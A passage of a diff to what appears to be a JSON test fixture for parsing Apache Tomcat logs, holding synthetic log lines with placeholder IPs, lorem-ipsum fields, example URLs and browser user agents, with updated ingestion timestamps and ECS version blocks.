%APACHETOMCAT- INDEX: 10.38.77.13||aquaeab||liqu||[24/Apr/2016:12:25:25 PT]||ehend||https://www5.example.net/uidolore/niamqu.gif?iat=tevelit#nsequat||loremagn||ipis||gelits||tatevel||3856||https://api.example.com/uovol/dmi.txt?quunt=ptat#ore||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||tsed", "event": { - "ingested": "2021-06-09T13:32:47.950326300Z" + "ingested": "2021-12-14T14:58:59.365390947Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 mUt2398.invalid %APACHETOMCAT- DEBUG: 10.11.201.109||boree||ugits||[08/May/2016:7:27:59 CEST]||iinea||https://www.example.org/idexea/riat.txt?tvol=moll#tatione||inB||deomni||tquovol||ntsuntin||3341||https://mail.example.org/imav/ididu.htm?tion=orsitame#quiratio||Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||iam", "event": { - "ingested": "2021-06-09T13:32:47.950331100Z" + "ingested": "2021-12-14T14:58:59.365391327Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3097-BADMTHD: 10.182.166.181||apariat||mol||[22/May/2016:2:30:33 CT]||olupta||https://api.example.org/toccae/tatno.gif?taliqu=temUten#ccusan||iqu||ollit||usan||aper||5529||https://example.org/uaera/sitas.txt?aedic=atquovo#iumto||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||mquaera", "event": { - "ingested": "2021-06-09T13:32:47.950336Z" + "ingested": "2021-12-14T14:58:59.365391724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%APACHETOMCAT-6283-null: 10.185.126.247||vel||quu||[05/Jun/2016:9:33:08 OMST]||avol||https://mail.example.net/atuse/ddoeiu.gif?idolore=onse#liq||metcon||smo||litessec||emporinc||5075||https://internal.example.com/atcu/oremagna.jpg?remipsum=liq#ist||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||caecatc", "event": { - "ingested": "2021-06-09T13:32:47.950340900Z" + "ingested": "2021-12-14T14:58:59.365392115Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 siuta2896.www.localhost %APACHETOMCAT- SEARCH: 10.72.114.23||enia||nsequu||[20/Jun/2016:4:35:42 PST]||rsint||https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf||antiumto||strude||ctetura||usmod||1640||https://mail.example.net/lor/fugit.jpg?rsitamet=lupt#xea||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||orain", "event": { - "ingested": "2021-06-09T13:32:47.950347400Z" + "ingested": "2021-12-14T14:58:59.365392500Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 oin6316.www5.host %APACHETOMCAT- TRACE: 10.129.241.147||lores||lapariat||[04/Jul/2016:11:38:16 PST]||etc||https://example.net/nimadmin/ditautfu.html?lpa=entsu#dun||onproide||luptat||itaut||imaven||152||https://internal.example.net/onproide/Nemoen.gif?pitla=ccu#urE||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||inculpaq", "event": { - "ingested": "2021-06-09T13:32:47.950352600Z" + "ingested": "2021-12-14T14:58:59.365393109Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 tionemu7691.www.local %APACHETOMCAT- BDMTHD: 
10.185.101.76||errorsi||des||[18/Jul/2016:6:40:50 GMT+02:00]||stl||https://www5.example.com/ono/stru.jpg?emaperi=tame#tinvol||tectobe||colabor||iusmodt||etdolo||3768||https://internal.example.net/ommod/sequatur.txt?tlabo=suntexp#ugiatnu||Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80||itecto", "event": { - "ingested": "2021-06-09T13:32:47.950357400Z" + "ingested": "2021-12-14T14:58:59.365393524Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3217-GET: 10.57.170.140||nsec||onse||[02/Aug/2016:1:43:25 OMST]||inibusBo||https://example.net/tion/eataev.htm?uiineavo=tisetq#irati||ici||giatquov||eritquii||dexeac||3088||https://www.example.org/oreseos/uames.txt?msequi=isnostru#iquaUten||Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36||iadese", "event": { - "ingested": "2021-06-09T13:32:47.950362200Z" + "ingested": "2021-12-14T14:58:59.365393984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1109-PUT: 10.33.153.47||hil||atquovo||[16/Aug/2016:8:45:59 GMT+02:00]||iineavo||https://internal.example.com/isno/taliq.htm?nnu=dolo#Loremip||idolor||emeumfu||CSed||lupt||6136||https://internal.example.net/quip/mporain.txt?uatD=iunt#temveleu||Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||tio", "event": { - "ingested": "2021-06-09T13:32:47.950366900Z" + "ingested": "2021-12-14T14:58:59.365394370Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 
15:48:33 conse2991.internal.lan %APACHETOMCAT- FGET: 10.116.104.101||gnam||tat||[30/Aug/2016:3:48:33 CET]||lumqui||https://internal.example.net/mdolore/rQuisau.gif?iavolu=den#tutla||olorema||iades||siarchi||datatn||5076||https://internal.example.net/mipsumd/eFinib.jpg?remi=saute#ercit||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||remagn", "event": { - "ingested": "2021-06-09T13:32:47.950372300Z" + "ingested": "2021-12-14T14:58:59.365394761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3361-null: 10.202.194.67||samvolu||ittenbyC||[13/Sep/2016:10:51:07 ET]||eirure||https://internal.example.com/oidentsu/atiset.jpg?ntor=lpaqui#sitame||iadese||nsectet||utla||utei||2716||https://example.com/tlabori/oin.jpg?quisnos=ite#ationul||Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||eritqu", "event": { - "ingested": "2021-06-09T13:32:47.950377300Z" + "ingested": "2021-12-14T14:58:59.365395267Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 wri2784.api.domain %APACHETOMCAT- PUT: 10.153.111.103||itquiin||modocon||[28/Sep/2016:5:53:42 PST]||taevit||https://www5.example.com/etconse/tincu.txt?lit=asun#estia||eaq||occae||ctetura||labore||4621||https://www.example.com/adeseru/emoe.html?atur=itanimi#itame||Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30||rehender", "event": { - "ingested": "2021-06-09T13:32:47.950382Z" + "ingested": "2021-12-14T14:58:59.365395687Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "%APACHETOMCAT-1637-DETECT_METHOD_TYPE: 10.52.186.29||equat||doloreme||[12/Oct/2016:12:56:16 GMT+02:00]||ione||https://www5.example.org/eriamea/amre.htm?magni=pisciv#iquidex||radipisc||tmo||fficiade||uscipit||4168||https://internal.example.net/oru/temqu.htm?etMalor=ipi#reseos||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mcolab", "event": { - "ingested": "2021-06-09T13:32:47.950387Z" + "ingested": "2021-12-14T14:58:59.365396076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 26 19:58:50 oquisqu2937.mail.domain %APACHETOMCAT- BDMTHD: 10.209.182.237||tper||olor||[26/Oct/2016:7:58:50 GMT-07:00]||osqui||https://www.example.org/iutali/fdeFi.jpg?liquide=etdol#uela||boN||eprehend||aevit||aboN||3423||https://example.net/tlabo/uames.gif?mpo=offi#giatnu||Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]||lor", "event": { - "ingested": "2021-06-09T13:32:47.950392100Z" + "ingested": "2021-12-14T14:58:59.365396467Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 dolore1287.internal.lan %APACHETOMCAT- CFYZ: 10.63.194.87||quisno||sin||[10/Nov/2016:3:01:24 CT]||aliquam||https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn||isnisiu||bore||tsu||tcons||3128||https://api.example.org/lorinre/olorsita.gif?idata=rumwritt#magnid||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||dol", "event": { - "ingested": 
"2021-06-09T13:32:47.950396600Z" + "ingested": "2021-12-14T14:58:59.365396862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4307-TRACE: 10.62.191.18||tevelite||orporiss||[24/Nov/2016:10:03:59 OMST]||tlabo||https://www.example.org/emvel/tmollita.htm?numqua=veni#eveli||eroi||dtemp||aliquide||ofde||4940||https://www5.example.org/maven/hende.jpg?labor=didunt#uptatema||Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||udan", "event": { - "ingested": "2021-06-09T13:32:47.950402200Z" + "ingested": "2021-12-14T14:58:59.365397245Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6040-CFYZ: 10.238.164.29||aturQui||utlabor||[08/Dec/2016:5:06:33 ET]||temvel||https://example.net/nisi/dant.txt?ecte=tinvolu#iurer||iciadese||quidolor||tessec||olupta||2660||https://example.org/idolor/uisau.jpg?llumdolo=nre#ercitat||Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||uiinea", "event": { - "ingested": "2021-06-09T13:32:47.950407400Z" + "ingested": "2021-12-14T14:58:59.365397636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1612-SEARCH: 10.155.230.17||eni||ionevo||[23/Dec/2016:12:09:07 CT]||Ute||https://internal.example.com/sintocc/tlabor.txt?tDuisaut=oinBC#quameius||ipsumdol||tet||etdo||urerepr||4674||https://example.com/tetu/stru.htm?tlabore=Exc#pora||Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||uteirure", "event": { - "ingested": 
"2021-06-09T13:32:47.950413200Z" + "ingested": "2021-12-14T14:58:59.365398126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 6 07:11:41 ide2767.www5.local %APACHETOMCAT- RNDMMTD: 10.102.229.102||nnum||tenbyCi||[06/Jan/2017:7:11:41 PST]||tco||https://example.net/officiad/itam.html?madmi=tur#roi||niamqui||orem||sno||atno||5263||https://mail.example.net/ntocca/ostru.txt?quiavol=rrorsi#temquiav||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||sec", "event": { - "ingested": "2021-06-09T13:32:47.950419100Z" + "ingested": "2021-12-14T14:58:59.365398514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 20 14:14:16 sBon1759.invalid %APACHETOMCAT- HEAD: 10.194.14.7||ten||vita||[20/Jan/2017:2:14:16 OMST]||ullamcor||https://mail.example.org/tor/qui.txt?eavolup=fugiatn#docon||etconsec||ios||evolu||ersp||3536||https://www5.example.org/sauteiru/mod.gif?tes=mquame#nihilmol||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||orain", "event": { - "ingested": "2021-06-09T13:32:47.950424Z" + "ingested": "2021-12-14T14:58:59.365398904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6113-get: 10.99.0.226||madmi||uidol||[03/Feb/2017:9:16:50 ET]||quameius||https://api.example.net/roid/inibusB.jpg?Nemoenim=squirati#Sedutp||utp||ema||rsitv||iciade||5649||https://example.com/lup/tatemUt.html?upida=tvolupt#eufugi||Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36||uredol", "event": { - "ingested": 
"2021-06-09T13:32:47.950429100Z" + "ingested": "2021-12-14T14:58:59.365399292Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6945-DETECT_METHOD_TYPE: 10.107.174.213||tenimad||minimav||[18/Feb/2017:4:19:24 OMST]||taedicta||https://www.example.net/str/idolore.txt?eetdolo=cteturad#untut||uamni||ctet||ati||uine||2438||https://api.example.org/loreme/untu.htm?ven=con#nisist||Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36||ium", "event": { - "ingested": "2021-06-09T13:32:47.950434800Z" + "ingested": "2021-12-14T14:58:59.365399703Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 idunt4707.host %APACHETOMCAT- ABCD: 10.84.25.23||laudant||isnost||[04/Mar/2017:11:21:59 CET]||rQuisau||https://mail.example.org/iscinge/ofdeFini.jpg?molli=velitse#oditem||gitsedqu||borios||rsitvolu||quam||5315||https://www.example.org/ineavo/pexe.htm?iadolor=amcol#adeser||Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||gitsed", "event": { - "ingested": "2021-06-09T13:32:47.950440Z" + "ingested": "2021-12-14T14:58:59.365400089Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4367-uGET: 10.193.143.108||idolo||luptate||[18/Mar/2017:6:24:33 PT]||atisun||https://www.example.org/epre/tobeata.html?quia=iduntu#idestlab||rnatur||ofdeFin||essequam||acommo||3105||https://api.example.com/cusant/atemq.gif?itecto=reetdol#totamre||Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 
YaApp_Android/10.91 YaSearchBrowser/10.91||ercita", "event": { - "ingested": "2021-06-09T13:32:47.950445200Z" + "ingested": "2021-12-14T14:58:59.365400481Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 emquia1497.www5.lan %APACHETOMCAT- INDEX: 10.190.51.22||uamei||siut||[02/Apr/2017:1:27:07 CT]||uisa||https://example.com/mexe/its.htm?ice=oles#edic||seq||tutlab||sau||atevelit||2450||https://example.org/aperia/ccaeca.gif?ttenby=boris#stenatu||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||orumSe", "event": { - "ingested": "2021-06-09T13:32:47.950450900Z" + "ingested": "2021-12-14T14:58:59.365400868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 riat3854.www5.home %APACHETOMCAT- BADMETHOD: 10.194.90.130||siut||tconsect||[16/Apr/2017:8:29:41 PT]||piscinge||https://www.example.com/velitess/naali.htm?nre=veli#volupta||rnatu||elitse||ima||quasia||2382||https://www5.example.com/quamqua/eacommod.html?iumdol=tpersp#stla||mobmail android 2.1.3.3150||sequamni", "event": { - "ingested": "2021-06-09T13:32:47.950456100Z" + "ingested": "2021-12-14T14:58:59.365401258Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6198-BDMTHD: 10.10.213.83||nea||psum||[30/Apr/2017:3:32:16 OMST]||ncididun||https://www.example.org/xeacomm/cinge.txt?apariat=vitaedi#lorsita||dolore||uptate||quidexea||ect||23||https://internal.example.com/ate/odoconse.jpg?quatu=veli#tenim||Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed 
[FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]||labo", "event": { - "ingested": "2021-06-09T13:32:47.950461Z" + "ingested": "2021-12-14T14:58:59.365401666Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 14 22:34:50 aboreetd5461.host %APACHETOMCAT- uGET: 10.52.125.9||hit||urv||[14/May/2017:10:34:50 ET]||nimid||https://api.example.org/texpli/exeacom.jpg?rita=esseci#tametcon||liqua||mvele||isis||uasiar||2552||https://mail.example.net/loremqu/dantium.htm?teirured=onemulla#dolorem||Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]||rauto", "event": { - "ingested": "2021-06-09T13:32:47.950468Z" + "ingested": "2021-12-14T14:58:59.365402063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5770-RNDMMTD: 10.19.17.202||nby||mve||[29/May/2017:5:37:24 PT]||isau||https://api.example.net/ibusBon/ven.gif?nsequat=doloreme#dun||reprehe||tincu||suntin||itse||814||https://www5.example.org/intocc/amcorp.html?ssecillu=liqua#olo||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||aec", "event": { - "ingested": "2021-06-09T13:32:47.950473600Z" + "ingested": "2021-12-14T14:58:59.365402570Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 iquidexe304.mail.test %APACHETOMCAT- RNDMMTD: 10.195.64.5||oreetd||uat||[12/Jun/2017:12:39:58 
PT]||moenimi||https://mail.example.org/oconsequ/edquiac.gif?preh=ercit#etMal||qua||rsita||ate||ipsamvo||344||https://api.example.com/tdol/upt.htm?asper=idunt#luptat||Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||ica", "event": { - "ingested": "2021-06-09T13:32:47.950478400Z" + "ingested": "2021-12-14T14:58:59.365402957Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 26 19:42:33 remips4828.www5.host %APACHETOMCAT- POST: 10.209.77.194||tvolup||itesseq||[26/Jun/2017:7:42:33 OMST]||snost||https://internal.example.com/llamc/nte.htm?utali=porinc#tetur||xce||dat||aincidu||nimadmin||4843||https://mail.example.com/eumfugi/etdolor.htm?dic=cola#amcor||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||elites", "event": { - "ingested": "2021-06-09T13:32:47.950483400Z" + "ingested": "2021-12-14T14:58:59.365403368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1952-MKCOL: 10.168.6.90||rem||amvolupt||[11/Jul/2017:2:45:07 GMT+02:00]||atisund||https://example.net/ites/isetq.gif?nisiut=tur#avolupt||ariatur||rer||iconseq||porincid||6941||https://mail.example.org/nofd/dipisci.txt?ilmol=eri#quunt||Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80||tae", "event": { - "ingested": "2021-06-09T13:32:47.950488200Z" + "ingested": "2021-12-14T14:58:59.365403761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-7717-rndmmtd: 10.89.137.238||plica||ore||[25/Jul/2017:9:47:41 
OMST]||emqu||https://mail.example.com/acommod/itsedd.html?admin=stenatu#inibu||est||uptatemU||leumiu||tla||4765||https://api.example.org/isa/niamqui.jpg?dqu=pid#rExc||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||erun", "event": { - "ingested": "2021-06-09T13:32:47.950493Z" + "ingested": "2021-12-14T14:58:59.365404146Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4574-OPTIONS: 10.246.61.213||ntutlabo||iusmodte||[08/Aug/2017:4:50:15 CT]||loi||https://example.org/Nequepor/eirure.htm?idid=tesse#sequat||giatquov||tconsec||miurerep||toccaec||7645||https://www5.example.net/psaqua/ullamcor.txt?qui=cupi#tame||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||orroq", "event": { - "ingested": "2021-06-09T13:32:47.950498100Z" + "ingested": "2021-12-14T14:58:59.365404609Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 22 23:52:50 orin5238.host %APACHETOMCAT- MKCOL: 10.117.44.138||orem||rcit||[22/Aug/2017:11:52:50 PST]||enderit||https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo||oluptas||emvele||isnost||olorem||2760||https://www5.example.net/quunt/acommod.jpg?sit=rumSect#ita||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||aliq", "event": { - "ingested": "2021-06-09T13:32:47.950503Z" + "ingested": "2021-12-14T14:58:59.365404999Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4801-PRONECT: 10.69.30.196||tore||elits||[06/Sep/2017:6:55:24 
OMST]||ruredo||https://example.net/temUt/ptassita.gif?uamnihi=risnis#uov||itlab||urmag||omm||equ||4808||https://www.example.net/siuta/urmagn.html?uptat=idex#ptateve||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||nimveni", "event": { - "ingested": "2021-06-09T13:32:47.950507900Z" + "ingested": "2021-12-14T14:58:59.365405388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-7668-BADMTHD: 10.135.91.88||ercit||eporroq||[20/Sep/2017:1:57:58 CT]||ugiatn||https://api.example.com/dictasun/abore.txt?modocon=ipsu#ntNeq||tate||urExce||asi||ectiono||2241||https://example.org/onu/liquaUte.txt?velillu=ria#atDu||Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||emq", "event": { - "ingested": "2021-06-09T13:32:47.950512900Z" + "ingested": "2021-12-14T14:58:59.365405778Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 agnaaliq1829.mail.test %APACHETOMCAT- ABCD: 10.81.45.174||tin||fugitse||[04/Oct/2017:9:00:32 CEST]||liquide||https://example.net/Sedutpe/prehen.html?rcit=aecatcup#olabor||estl||erun||iruredol||incidid||7699||https://api.example.org/edquian/loremeu.gif?volupta=dmi#untexpl||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mipsamvo", "event": { - "ingested": "2021-06-09T13:32:47.950517800Z" + "ingested": "2021-12-14T14:58:59.365406160Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3517-rndmmtd: 10.87.179.233||mnisiut||avolu||[19/Oct/2017:4:03:07 
PST]||eum||https://www.example.org/umetMal/asper.htm?metcons=itasper#uae||mve||uia||iciad||lorem||6137||https://www.example.org/redol/gnaa.htm?aliquamq=dtempori#toditaut||Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||dexerc", "event": { - "ingested": "2021-06-09T13:32:47.950523200Z" + "ingested": "2021-12-14T14:58:59.365406577Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2669-COOK: 10.198.57.130||hitec||henderit||[02/Nov/2017:11:05:41 OMST]||perspici||https://api.example.net/mquisn/queips.gif?emUte=molestia#quir||eavolup||emip||ver||erc||294||https://example.com/iuntNequ/esseq.txt?remq=veniamq#occ||Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) 